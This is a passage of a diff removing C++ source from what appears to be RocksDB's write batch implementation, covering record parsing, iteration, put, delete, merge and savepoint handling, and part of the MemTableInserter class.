-      // for range delete, "key" is begin_key, "value" is end_key
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch DeleteRange");
-      }
-      break;
-    case kTypeColumnFamilyMerge:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch Merge");
-      }
-    // intentional fallthrough
-    case kTypeMerge:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch Merge");
-      }
-      break;
-    case kTypeColumnFamilyBlobIndex:
-      if (!GetVarint32(input, column_family)) {
-        return Status::Corruption("bad WriteBatch BlobIndex");
-      }
-    // intentional fallthrough
-    case kTypeBlobIndex:
-      if (!GetLengthPrefixedSlice(input, key) ||
-          !GetLengthPrefixedSlice(input, value)) {
-        return Status::Corruption("bad WriteBatch BlobIndex");
-      }
-      break;
-    case kTypeLogData:
-      assert(blob != nullptr);
-      if (!GetLengthPrefixedSlice(input, blob)) {
-        return Status::Corruption("bad WriteBatch Blob");
-      }
-      break;
-    case kTypeNoop:
-    case kTypeBeginPrepareXID:
-      break;
-    case kTypeEndPrepareXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad EndPrepare XID");
-      }
-      break;
-    case kTypeCommitXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad Commit XID");
-      }
-      break;
-    case kTypeRollbackXID:
-      if (!GetLengthPrefixedSlice(input, xid)) {
-        return Status::Corruption("bad Rollback XID");
-      }
-      break;
-    default:
-      return Status::Corruption("unknown WriteBatch tag");
-  }
-  return Status::OK();
-}
-
-Status WriteBatch::Iterate(Handler* handler) const {
-  Slice input(rep_);
-  if (input.size() < WriteBatchInternal::kHeader) {
-    return Status::Corruption("malformed WriteBatch (too small)");
-  }
-
-  input.remove_prefix(WriteBatchInternal::kHeader);
-  Slice key, value, blob, xid;
-  int found = 0;
-  Status s;
-  while (s.ok() && !input.empty() && handler->Continue()) {
-    char tag = 0;
-    uint32_t column_family = 0;  // default
-
-    s = ReadRecordFromWriteBatch(&input, &tag, &column_family, &key, &value,
-                                 &blob, &xid);
-    if (!s.ok()) {
-      return s;
-    }
-
-    switch (tag) {
-      case kTypeColumnFamilyValue:
-      case kTypeValue:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_PUT));
-        s = handler->PutCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyDeletion:
-      case kTypeDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_DELETE));
-        s = handler->DeleteCF(column_family, key);
-        found++;
-        break;
-      case kTypeColumnFamilySingleDeletion:
-      case kTypeSingleDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_SINGLE_DELETE));
-        s = handler->SingleDeleteCF(column_family, key);
-        found++;
-        break;
-      case kTypeColumnFamilyRangeDeletion:
-      case kTypeRangeDeletion:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_DELETE_RANGE));
-        s = handler->DeleteRangeCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyMerge:
-      case kTypeMerge:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_MERGE));
-        s = handler->MergeCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeColumnFamilyBlobIndex:
-      case kTypeBlobIndex:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_BLOB_INDEX));
-        s = handler->PutBlobIndexCF(column_family, key, value);
-        found++;
-        break;
-      case kTypeLogData:
-        handler->LogData(blob);
-        break;
-      case kTypeBeginPrepareXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_BEGIN_PREPARE));
-        handler->MarkBeginPrepare();
-        break;
-      case kTypeEndPrepareXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_END_PREPARE));
-        handler->MarkEndPrepare(xid);
-        break;
-      case kTypeCommitXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_COMMIT));
-        handler->MarkCommit(xid);
-        break;
-      case kTypeRollbackXID:
-        assert(content_flags_.load(std::memory_order_relaxed) &
-               (ContentFlags::DEFERRED | ContentFlags::HAS_ROLLBACK));
-        handler->MarkRollback(xid);
-        break;
-      case kTypeNoop:
-        break;
-      default:
-        return Status::Corruption("unknown WriteBatch tag");
-    }
-  }
-  if (!s.ok()) {
-    return s;
-  }
-  if (found != WriteBatchInternal::Count(this)) {
-    return Status::Corruption("WriteBatch has wrong count");
-  } else {
-    return Status::OK();
-  }
-}
-
-int WriteBatchInternal::Count(const WriteBatch* b) {
-  return DecodeFixed32(b->rep_.data() + 8);
-}
-
-void WriteBatchInternal::SetCount(WriteBatch* b, int n) {
-  EncodeFixed32(&b->rep_[8], n);
-}
-
-SequenceNumber WriteBatchInternal::Sequence(const WriteBatch* b) {
-  return SequenceNumber(DecodeFixed64(b->rep_.data()));
-}
-
-void WriteBatchInternal::SetSequence(WriteBatch* b, SequenceNumber seq) {
-  EncodeFixed64(&b->rep_[0], seq);
-}
-
-size_t WriteBatchInternal::GetFirstOffset(WriteBatch* b) {
-  return WriteBatchInternal::kHeader;
-}
-
-Status WriteBatchInternal::Put(WriteBatch* b, uint32_t column_family_id,
-                               const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeValue));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyValue));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(
-      b->content_flags_.load(std::memory_order_relaxed) | ContentFlags::HAS_PUT,
-      std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Put(ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) {
-  return WriteBatchInternal::Put(this, GetColumnFamilyID(column_family), key,
-                                 value);
-}
-
-Status WriteBatchInternal::Put(WriteBatch* b, uint32_t column_family_id,
-                               const SliceParts& key, const SliceParts& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeValue));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyValue));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  PutLengthPrefixedSliceParts(&b->rep_, value);
-  b->content_flags_.store(
-      b->content_flags_.load(std::memory_order_relaxed) | ContentFlags::HAS_PUT,
-      std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-                       const SliceParts& value) {
-  return WriteBatchInternal::Put(this, GetColumnFamilyID(column_family), key,
-                                 value);
-}
-
-Status WriteBatchInternal::InsertNoop(WriteBatch* b) {
-  b->rep_.push_back(static_cast<char>(kTypeNoop));
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkEndPrepare(WriteBatch* b, const Slice& xid) {
-  // a manually constructed batch can only contain one prepare section
-  assert(b->rep_[12] == static_cast<char>(kTypeNoop));
-
-  // all savepoints up to this point are cleared
-  if (b->save_points_ != nullptr) {
-    while (!b->save_points_->stack.empty()) {
-      b->save_points_->stack.pop();
-    }
-  }
-
-  // rewrite noop as begin marker
-  b->rep_[12] = static_cast<char>(kTypeBeginPrepareXID);
-  b->rep_.push_back(static_cast<char>(kTypeEndPrepareXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_END_PREPARE |
-                              ContentFlags::HAS_BEGIN_PREPARE,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkCommit(WriteBatch* b, const Slice& xid) {
-  b->rep_.push_back(static_cast<char>(kTypeCommitXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_COMMIT,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::MarkRollback(WriteBatch* b, const Slice& xid) {
-  b->rep_.push_back(static_cast<char>(kTypeRollbackXID));
-  PutLengthPrefixedSlice(&b->rep_, xid);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_ROLLBACK,
-                          std::memory_order_relaxed);
-  return Status::OK();
-}
-
-Status WriteBatchInternal::Delete(WriteBatch* b, uint32_t column_family_id,
-                                  const Slice& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Delete(ColumnFamilyHandle* column_family, const Slice& key) {
-  return WriteBatchInternal::Delete(this, GetColumnFamilyID(column_family),
-                                    key);
-}
-
-Status WriteBatchInternal::Delete(WriteBatch* b, uint32_t column_family_id,
-                                  const SliceParts& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Delete(ColumnFamilyHandle* column_family,
-                          const SliceParts& key) {
-  return WriteBatchInternal::Delete(this, GetColumnFamilyID(column_family),
-                                    key);
-}
-
-Status WriteBatchInternal::SingleDelete(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const Slice& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeSingleDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilySingleDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_SINGLE_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::SingleDelete(ColumnFamilyHandle* column_family,
-                                const Slice& key) {
-  return WriteBatchInternal::SingleDelete(
-      this, GetColumnFamilyID(column_family), key);
-}
-
-Status WriteBatchInternal::SingleDelete(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const SliceParts& key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeSingleDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilySingleDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_SINGLE_DELETE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::SingleDelete(ColumnFamilyHandle* column_family,
-                                const SliceParts& key) {
-  return WriteBatchInternal::SingleDelete(
-      this, GetColumnFamilyID(column_family), key);
-}
-
-Status WriteBatchInternal::DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                                       const Slice& begin_key,
-                                       const Slice& end_key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeRangeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyRangeDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, begin_key);
-  PutLengthPrefixedSlice(&b->rep_, end_key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE_RANGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::DeleteRange(ColumnFamilyHandle* column_family,
-                               const Slice& begin_key, const Slice& end_key) {
-  return WriteBatchInternal::DeleteRange(this, GetColumnFamilyID(column_family),
-                                         begin_key, end_key);
-}
-
-Status WriteBatchInternal::DeleteRange(WriteBatch* b, uint32_t column_family_id,
-                                       const SliceParts& begin_key,
-                                       const SliceParts& end_key) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeRangeDeletion));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyRangeDeletion));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, begin_key);
-  PutLengthPrefixedSliceParts(&b->rep_, end_key);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_DELETE_RANGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::DeleteRange(ColumnFamilyHandle* column_family,
-                               const SliceParts& begin_key,
-                               const SliceParts& end_key) {
-  return WriteBatchInternal::DeleteRange(this, GetColumnFamilyID(column_family),
-                                         begin_key, end_key);
-}
-
-Status WriteBatchInternal::Merge(WriteBatch* b, uint32_t column_family_id,
-                                 const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeMerge));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyMerge));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_MERGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Merge(ColumnFamilyHandle* column_family, const Slice& key,
-                         const Slice& value) {
-  return WriteBatchInternal::Merge(this, GetColumnFamilyID(column_family), key,
-                                   value);
-}
-
-Status WriteBatchInternal::Merge(WriteBatch* b, uint32_t column_family_id,
-                                 const SliceParts& key,
-                                 const SliceParts& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeMerge));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyMerge));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSliceParts(&b->rep_, key);
-  PutLengthPrefixedSliceParts(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_MERGE,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::Merge(ColumnFamilyHandle* column_family,
-                         const SliceParts& key, const SliceParts& value) {
-  return WriteBatchInternal::Merge(this, GetColumnFamilyID(column_family), key,
-                                   value);
-}
-
-Status WriteBatchInternal::PutBlobIndex(WriteBatch* b,
-                                        uint32_t column_family_id,
-                                        const Slice& key, const Slice& value) {
-  LocalSavePoint save(b);
-  WriteBatchInternal::SetCount(b, WriteBatchInternal::Count(b) + 1);
-  if (column_family_id == 0) {
-    b->rep_.push_back(static_cast<char>(kTypeBlobIndex));
-  } else {
-    b->rep_.push_back(static_cast<char>(kTypeColumnFamilyBlobIndex));
-    PutVarint32(&b->rep_, column_family_id);
-  }
-  PutLengthPrefixedSlice(&b->rep_, key);
-  PutLengthPrefixedSlice(&b->rep_, value);
-  b->content_flags_.store(b->content_flags_.load(std::memory_order_relaxed) |
-                              ContentFlags::HAS_BLOB_INDEX,
-                          std::memory_order_relaxed);
-  return save.commit();
-}
-
-Status WriteBatch::PutLogData(const Slice& blob) {
-  LocalSavePoint save(this);
-  rep_.push_back(static_cast<char>(kTypeLogData));
-  PutLengthPrefixedSlice(&rep_, blob);
-  return save.commit();
-}
-
-void WriteBatch::SetSavePoint() {
-  if (save_points_ == nullptr) {
-    save_points_ = new SavePoints();
-  }
-  // Record length and count of current batch of writes.
-  save_points_->stack.push(SavePoint(
-      GetDataSize(), Count(), content_flags_.load(std::memory_order_relaxed)));
-}
-
-Status WriteBatch::RollbackToSavePoint() {
-  if (save_points_ == nullptr || save_points_->stack.size() == 0) {
-    return Status::NotFound();
-  }
-
-  // Pop the most recent savepoint off the stack
-  SavePoint savepoint = save_points_->stack.top();
-  save_points_->stack.pop();
-
-  assert(savepoint.size <= rep_.size());
-  assert(savepoint.count <= Count());
-
-  if (savepoint.size == rep_.size()) {
-    // No changes to rollback
-  } else if (savepoint.size == 0) {
-    // Rollback everything
-    Clear();
-  } else {
-    rep_.resize(savepoint.size);
-    WriteBatchInternal::SetCount(this, savepoint.count);
-    content_flags_.store(savepoint.content_flags, std::memory_order_relaxed);
-  }
-
-  return Status::OK();
-}
-
-Status WriteBatch::PopSavePoint() {
-  if (save_points_ == nullptr || save_points_->stack.size() == 0) {
-    return Status::NotFound();
-  }
-
-  // Pop the most recent savepoint off the stack
-  save_points_->stack.pop();
-
-  return Status::OK();
-}
-
-class MemTableInserter : public WriteBatch::Handler {
-
-  SequenceNumber sequence_;
-  ColumnFamilyMemTables* const cf_mems_;
-  FlushScheduler* const flush_scheduler_;
-  const bool ignore_missing_column_families_;
-  const uint64_t recovering_log_number_;
-  // log number that all Memtables inserted into should reference
-  uint64_t log_number_ref_;
-  DBImpl* db_;
-  const bool concurrent_memtable_writes_;
-  bool       post_info_created_;
-
-  bool* has_valid_writes_;
-  // On some (!) platforms just default creating
-  // a map is too expensive in the Write() path as they
-  // cause memory allocations though unused.
-  // Make creation optional but do not incur
-  // unique_ptr additional allocation
-  using 
-  MemPostInfoMap = std::map<MemTable*, MemTablePostProcessInfo>;
-  using
-  PostMapType = std::aligned_storage<sizeof(MemPostInfoMap)>::type;
-  PostMapType mem_post_info_map_;
-  // current recovered transaction we are rebuilding (recovery)
-  WriteBatch* rebuilding_trx_;
-
-  MemPostInfoMap& GetPostMap() {
-    assert(concurrent_memtable_writes_);
-    if(!post_info_created_) {
-      new (&mem_post_info_map_) MemPostInfoMap();
-      post_info_created_ = true;
-    }
-    return *reinterpret_cast<MemPostInfoMap*>(&mem_post_info_map_);
-  }
-
-public:
-  // cf_mems should not be shared with concurrent inserters
- MemTableInserter(SequenceNumber _sequence, ColumnFamilyMemTables* cf_mems,
-                  FlushScheduler* flush_scheduler,
-                  bool ignore_missing_column_families,
-                  uint64_t recovering_log_number, DB* db,
-                  bool concurrent_memtable_writes,
-                  bool* has_valid_writes = nullptr)
-     : sequence_(_sequence),
-       cf_mems_(cf_mems),
-       flush_scheduler_(flush_scheduler),
-       ignore_missing_column_families_(ignore_missing_column_families),
-       recovering_log_number_(recovering_log_number),
-       log_number_ref_(0),
-       db_(reinterpret_cast<DBImpl*>(db)),
-       concurrent_memtable_writes_(concurrent_memtable_writes),
-       post_info_created_(false),
-       has_valid_writes_(has_valid_writes),
-       rebuilding_trx_(nullptr) {
-   assert(cf_mems_);
-  }
-
-  ~MemTableInserter() {
-    if (post_info_created_) {
-      reinterpret_cast<MemPostInfoMap*>
-        (&mem_post_info_map_)->~MemPostInfoMap();
-    }
-  }
-
-  MemTableInserter(const MemTableInserter&) = delete;
-  MemTableInserter& operator=(const MemTableInserter&) = delete;
-
-  void set_log_number_ref(uint64_t log) { log_number_ref_ = log; }
-
-  SequenceNumber sequence() const { return sequence_; }
-
-  void PostProcess() {
-    assert(concurrent_memtable_writes_);
-    // If post info was not created there is nothing
-    // to process and no need to create on demand
-    if(post_info_created_) {
-      for (auto& pair : GetPostMap()) {
-        pair.first->BatchPostProcess(pair.second);
-      }
-    }
-  }
-
-  bool SeekToColumnFamily(uint32_t column_family_id, Status* s) {
-    // If we are in a concurrent mode, it is the caller's responsibility
-    // to clone the original ColumnFamilyMemTables so that each thread
-    // has its own instance.  Otherwise, it must be guaranteed that there
-    // is no concurrent access
-    bool found = cf_mems_->Seek(column_family_id);
-    if (!found) {
-      if (ignore_missing_column_families_) {
-        *s = Status::OK();
-      } else {
-        *s = Status::InvalidArgument(
-            "Invalid column family specified in write batch");
-      }
-      return false;
-    }
-    if (recovering_log_number_ != 0 &&
-        recovering_log_number_ < cf_mems_->GetLogNumber()) {
-      // This is true only in recovery environment (recovering_log_number_ is
-      // always 0 in
-      // non-recovery, regular write code-path)
-      // * If recovering_log_number_ < cf_mems_->GetLogNumber(), this means that
-      // column
-      // family already contains updates from this log. We can't apply updates
-      // twice because of update-in-place or merge workloads -- ignore the
-      // update
-      *s = Status::OK();
-      return false;
-    }
-
-    if (has_valid_writes_ != nullptr) {
-      *has_valid_writes_ = true;
-    }
-
-    if (log_number_ref_ > 0) {
-      cf_mems_->GetMemTable()->RefLogContainingPrepSection(log_number_ref_);
-    }
-
-    return true;
-  }
-
-  Status PutCFImpl(uint32_t column_family_id, const Slice& key,
-                   const Slice& value, ValueType value_type) {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Put(rebuilding_trx_, column_family_id, key, value);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    MemTable* mem = cf_mems_->GetMemTable();
-    auto* moptions = mem->GetImmutableMemTableOptions();
-    if (!moptions->inplace_update_support) {
-      mem->Add(sequence_, value_type, key, value, concurrent_memtable_writes_,
-               get_post_process_info(mem));
-    } else if (moptions->inplace_callback == nullptr) {
-      assert(!concurrent_memtable_writes_);
-      mem->Update(sequence_, key, value);
-      RecordTick(moptions->statistics, NUMBER_KEYS_UPDATED);
-    } else {
-      assert(!concurrent_memtable_writes_);
-      if (mem->UpdateCallback(sequence_, key, value)) {
-      } else {
-        // key not found in memtable. Do sst get, update, add
-        SnapshotImpl read_from_snapshot;
-        read_from_snapshot.number_ = sequence_;
-        ReadOptions ropts;
-        ropts.snapshot = &read_from_snapshot;
-
-        std::string prev_value;
-        std::string merged_value;
-
-        auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-        Status s = Status::NotSupported();
-        if (db_ != nullptr && recovering_log_number_ == 0) {
-          if (cf_handle == nullptr) {
-            cf_handle = db_->DefaultColumnFamily();
-          }
-          s = db_->Get(ropts, cf_handle, key, &prev_value);
-        }
-
-        char* prev_buffer = const_cast<char*>(prev_value.c_str());
-        uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-        auto status = moptions->inplace_callback(s.ok() ? prev_buffer : nullptr,
-                                                 s.ok() ? &prev_size : nullptr,
-                                                 value, &merged_value);
-        if (status == UpdateStatus::UPDATED_INPLACE) {
-          // prev_value is updated in-place with final value.
-          mem->Add(sequence_, value_type, key, Slice(prev_buffer, prev_size));
-          RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN);
-        } else if (status == UpdateStatus::UPDATED) {
-          // merged_value contains the final value.
-          mem->Add(sequence_, value_type, key, Slice(merged_value));
-          RecordTick(moptions->statistics, NUMBER_KEYS_WRITTEN);
-        }
-      }
-    }
-    // Since all Puts are logged in trasaction logs (if enabled), always bump
-    // sequence number. Even if the update eventually fails and does not result
-    // in memtable add/update.
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                       const Slice& value) override {
-    return PutCFImpl(column_family_id, key, value, kTypeValue);
-  }
-
-  Status DeleteImpl(uint32_t column_family_id, const Slice& key,
-                    const Slice& value, ValueType delete_type) {
-    MemTable* mem = cf_mems_->GetMemTable();
-    mem->Add(sequence_, delete_type, key, value, concurrent_memtable_writes_,
-             get_post_process_info(mem));
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status DeleteCF(uint32_t column_family_id,
-                          const Slice& key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Delete(rebuilding_trx_, column_family_id, key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    return DeleteImpl(column_family_id, key, Slice(), kTypeDeletion);
-  }
-
-  virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                const Slice& key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::SingleDelete(rebuilding_trx_, column_family_id, key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    return DeleteImpl(column_family_id, key, Slice(), kTypeSingleDeletion);
-  }
-
-  virtual Status DeleteRangeCF(uint32_t column_family_id,
-                               const Slice& begin_key,
-                               const Slice& end_key) override {
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::DeleteRange(rebuilding_trx_, column_family_id,
-                                      begin_key, end_key);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-    if (db_ != nullptr) {
-      auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-      if (cf_handle == nullptr) {
-        cf_handle = db_->DefaultColumnFamily();
-      }
-      auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cf_handle)->cfd();
-      if (!cfd->is_delete_range_supported()) {
-        return Status::NotSupported(
-            std::string("DeleteRange not supported for table type ") +
-            cfd->ioptions()->table_factory->Name() + " in CF " +
-            cfd->GetName());
-      }
-    }
-
-    return DeleteImpl(column_family_id, begin_key, end_key, kTypeRangeDeletion);
-  }
-
-  virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-    assert(!concurrent_memtable_writes_);
-    if (rebuilding_trx_ != nullptr) {
-      WriteBatchInternal::Merge(rebuilding_trx_, column_family_id, key, value);
-      return Status::OK();
-    }
-
-    Status seek_status;
-    if (!SeekToColumnFamily(column_family_id, &seek_status)) {
-      ++sequence_;
-      return seek_status;
-    }
-
-    MemTable* mem = cf_mems_->GetMemTable();
-    auto* moptions = mem->GetImmutableMemTableOptions();
-    bool perform_merge = false;
-
-    // If we pass DB through and options.max_successive_merges is hit
-    // during recovery, Get() will be issued which will try to acquire
-    // DB mutex and cause deadlock, as DB mutex is already held.
-    // So we disable merge in recovery
-    if (moptions->max_successive_merges > 0 && db_ != nullptr &&
-        recovering_log_number_ == 0) {
-      LookupKey lkey(key, sequence_);
-
-      // Count the number of successive merges at the head
-      // of the key in the memtable
-      size_t num_merges = mem->CountSuccessiveMergeEntries(lkey);
-
-      if (num_merges >= moptions->max_successive_merges) {
-        perform_merge = true;
-      }
-    }
-
-    if (perform_merge) {
-      // 1) Get the existing value
-      std::string get_value;
-
-      // Pass in the sequence number so that we also include previous merge
-      // operations in the same batch.
-      SnapshotImpl read_from_snapshot;
-      read_from_snapshot.number_ = sequence_;
-      ReadOptions read_options;
-      read_options.snapshot = &read_from_snapshot;
-
-      auto cf_handle = cf_mems_->GetColumnFamilyHandle();
-      if (cf_handle == nullptr) {
-        cf_handle = db_->DefaultColumnFamily();
-      }
-      db_->Get(read_options, cf_handle, key, &get_value);
-      Slice get_value_slice = Slice(get_value);
-
-      // 2) Apply this merge
-      auto merge_operator = moptions->merge_operator;
-      assert(merge_operator);
-
-      std::string new_value;
-
-      Status merge_status = MergeHelper::TimedFullMerge(
-          merge_operator, key, &get_value_slice, {value}, &new_value,
-          moptions->info_log, moptions->statistics, Env::Default());
-
-      if (!merge_status.ok()) {
-        // Failed to merge!
-        // Store the delta in memtable
-        perform_merge = false;
-      } else {
-        // 3) Add value to memtable
-        mem->Add(sequence_, kTypeValue, key, new_value);
-      }
-    }
-
-    if (!perform_merge) {
-      // Add merge operator to memtable
-      mem->Add(sequence_, kTypeMerge, key, value);
-    }
-
-    sequence_++;
-    CheckMemtableFull();
-    return Status::OK();
-  }
-
-  virtual Status PutBlobIndexCF(uint32_t column_family_id, const Slice& key,
-                                const Slice& value) override {
-    // Same as PutCF except for value type.
-    return PutCFImpl(column_family_id, key, value, kTypeBlobIndex);
-  }
-
-  void CheckMemtableFull() {
